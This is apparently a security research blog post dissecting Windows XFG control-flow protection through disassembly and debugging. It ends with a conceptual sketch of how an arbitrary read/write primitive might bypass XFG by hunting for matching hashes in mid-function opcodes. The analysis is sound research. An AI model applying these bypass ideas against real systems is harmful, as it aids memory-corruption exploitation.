Note that you will need Visual Studio 2019 Preview + at least Windows 10 21H1 in order to use XFG. Additionally, XFG is not found in the GUI compilation options.

Using the /guard:xfg flag in compilation and linking, we can enable XFG for our application.

Notice that even though it was not selected, CFG is still enabled for our application.

Let’s crack open IDA again to see how the main() function looks with the addition of XFG.

Very interesting! Firstly, we can see that R10 takes in the value of the XFG “type-based” hash. Then, a call is performed to the XFG dispatch call __guard_xfg_dispatch_icall_fptr. Note that the hash has been deemed “immutable” by Microsoft and cannot be modified by an attacker, due to its read only state.

In the image, below, the location of the XFG hash is at 00007ff7ded4110c

We can see that this address is executable (obviously) and readable - with the ability to write disabled.

Additionally, you can use the dumpbin tool to print out the functions protected by CFG/XFG. Functions protected by XFG are denoted with an X

Before we move on, one interesting thing to note is that the XFG hash is already placed 8 bytes above an XFG protected function BEFORE any code execution actually occurs.

For instance, Source!cfgTest is an XFG protected function. 8 bytes above this function is the hash seen in the previous image, but with an additional bit set.

We will see why this additional bit has been set when we step through the functions that perform XFG checks.

Moving on, let’s step through this in WinDbg to see what we are working with here, and how execution flow will go.

Firstly, execution lands on the XFG dispatch function.

This time, when the __guard_xfg_dispatch_icall_fptr function is dereferenced, a jump to the function ntdll!LdrpDispatchUserCallTargetXFG is performed.

Firstly, a bitwise OR of the XFG hash and 1 occurs, with the result placed in R10. In our case, this sets a bit in the XFG function hash.

Next, a test al, 0xf operation occurs, which performs a bitwise AND between the lower 8 bits of AX (AL) and 0xf.

As we can see from the image above, this sets the zero flag in our case. Additionally, now we have reached a possible jump within ntdll!LdrpDispatchUserCallTargetXFG

Since the zero flag has been set, we will NOT take the jump and instead move on to the next instruction, test ax, 0xFFF.

Stepping through test ax, 0xFFF, which will perform a bitwise AND with the lower 16 bits of EAX and 0xFFF, plus set the zero flag accordingly, we see that we have cleared the zero flag in the image below. This means the jump will not occur, and we continue to move deeper into the ntdll!LdrpDispatchUserCallTargetXFG function.

Finally, we land on the cmp instruction which compares the hash 8 bytes above RAX (our target function) with the hash preserved in R10.

The compare statement, because the values are equal, causes the zero flag to be set. This skips the next jump, and performs the final jump to our target function in RAX!

This is how a function protected by XFG is checked! Let’s now edit our code a bit and explore XFG a bit more.

Let’s Keep Going!

Recall that an XFG hash is made up of a function’s return type and any parameters. Let’s update our code to invoke another function of a different type.

We have changed the protectMe2() function to a function that returns an integer and takes a parameter of the type integer. This is different than our void cfgTest() function. We also set a function pointer, int (*cfgTest2) equal to the int protectMe2() function in order to create a new XFG hash for a different function type (int in this case). Let’s recompile our program and disassemble it in IDA to see how the two functions may vary from an XFG perspective.

Very interesting! As we can see from the above image, there are two different hashes now. The hash for our original function has remained the same. However, the hash for the int protectMe2() function is very different, but the last 12 bits of each hash in hexadecimal is 870 in our case. This interesting and may be worth noting.

Additionally, static and dynamic analysis both show that even before any code has executed, the actual hash that is placed 8 bytes above each function. Additionally, the hashes already have an additional bit set, just as we saw last time.

Let’s take this opportunity to showcase why XFG is significantly stronger than CFG.

Let’s simulate an arbitrary write again by overwriting what Source!cfgTest1 points to with Source!protectMe2.

After simulating the arbitrary write, we pick up execution in ntdll!LdrpDispatchUserCallTargetXFG again. Stepping through a few instructions, we once again land on the cmp instruction which checks to see if the preserved XFG hash matches the current XFG hash.

As we can see below, the hashes do not match!

Since the hashes do not match, this will cause XFG to determine a function pointer has been overwritten with something it should not have been overwritten with - and causes a program crash. Even though the function pointer was overwritten by another function within the same bitmap - XFG still will crash the process.

Let’s examine another scenario, with two functions of the same return type - but not the same amount of parameters.

To achieve this, our code has been edited to the following.

As we can see from the above image, we are using all integer functions now. However, the int cfgTest() function has two more parameters than the int protectMe2() function. Let’s compile and perform some static analysis in IDA.

The only difference between the two functions protected by XFG is the amount of parameters that int cfgTest() has, and yet the hashes are TOTALLY different. From a defensive perspective, it seems like even very similar functions are viewed as “very different”.

Additionally, we notice that the last 12 bits of the int cfgTest() hash have become 371 in hexadecimal instead of the previously mentioned 871 value. This means that XFG hashes seem to be unique until the last 8 bits. This is indicative of the hash only being unique up until about 56 bits.

As a sanity check and for completeness sake, let’s see what happens when two identical functions are assigned an XFG hash.

OMG Samesies!

Here is an edited version of our code, with two identical functions.

Disassembling the functions in IDA, we can see that the hashes this time are identical.

Obviously, since the hashing process for an XFG hash takes a function prototype and hashes it, the two hashes are going to be the same. I would not call this a flaw at all, because it is obvious Microsoft knew to this going in. However, I feel this is a nice win for Microsoft in terms of their overall CFI strategy because as David pointed out, this was very little overhead to the already existing CFG infrastructure.

However, from an adversarial standpoint - it must be said. XFG functions can be overwritten, so long as the function is basically an identical prototype of the original function.

Potential Bypasses?

As mentioned above, utilizing functions of identical prototypes generates identical XFG hashes. Knowing this, it seems as though it could be possible to overwrite a function with an identical function of the same prototype. This is SIGNIFICANTLY stronger than CFG in terms of what functions can actually be called.

Let’s talk about one more (potential) additional potential bypass.

As we know, functions protected by XFG have an XFG hash placed above them (8 bytes above to be more specific). What would happen for instance, if we performed a function pointer overwrite and called into the middle of a function, like KERNELBASE!VirtualProtect.

As we can see from the above image, calling into the middle of this function shows us that these hex numbers are being interpreted as opcodes, not memory addresses. This means that if XFG checks if a function pointer is overwritten by KERNELBASE!VirtualProtect, it would load the address of this function into RAX per the usual routine for XFG/CFG function checks. Then, this address is dereferenced at an offset of negative 8 to perform the XFG check. When this dereference happens, since this address contains opcodes, the opcodes that are present when calling into the middle of the function will be used in the XFG check.

Let’s perform a function pointer overwrite.

Note that the machine was restarted in between screenshots, causing addresses to change (but the symbols will remain the same).

Next, let’s step through the XFG dispatch functions and reach the compare statement.

Hitting the compare statement, we can see that R10 contains the preserved XFG hash, while RAX just contains the address of KERNELBASE!VirtualProtect + 0x50.

Taking a look at RAX - 8, where the XFG check occurs, we can see that the opcodes that reside within KERNELBASE!VirutalProtect are being treated as the “compared hash”.

Although this compare will fail, this brings up an interesting point.

Since calling into a middle of a function results in the function’s data being treated as opcodes and not memory addresses (usually), it may be possible for an adversary to utilize an arbitrary read/write primitive to do the following.

  1. Locate the XFG hash for a function you want to overwrite
  2. Perform a loop to dereference the process space’s memory and look for patterns that are identical to the XFG hash (remember, we still have to abide by CFG’s rules and choosing a function exported by the application or a function that is additionally located in the same bitmap)
  3. Overwrite the function pointer with any viable candidates

Although you most likely are going to be very hard pressed to find anything identical to the hash in terms of opcodes in the middle of a function AND additionally make whatever you find useful from an attacker’s perspective, this is still possible it seems.

Final Thoughts

I think personally that XFG is an awesome mitigation and I am excited to see how people get creative with the solution. However, until CET comes into play, overwriting return addresses on the stack seems like it will still be fair game. I think the combination of XFG and CET is going to be very interesting for exploitation in the future. I think XFG is a great and pretty creative mitigation. However, it has yet to be seen yet how it performs against Indirect Branch Tracking (IBT), which is CET’s forward-edge protection. All together, I think Microsoft has done a great thing with XFG by implementing it and not letting all of the work done with CFG go to waste.

As always! Peace, love, and positivity :-)

The Current State of Exploit Development, Part 2

20 August 2020 at 00:00

CrowdStrike Blog

Today I am very happy to have released my second blog for CrowdStrike! This blog, which builds off of my last one, talks about some additional mitigations like ACG, XFG, and VBS/HVCI which have made exploitation more expensive and time consuming. This blog rounds out the series and I hope you have found it useful! I learned a lot when I put this two part series together.

You can find the blog here. Enjoy!

❌
❌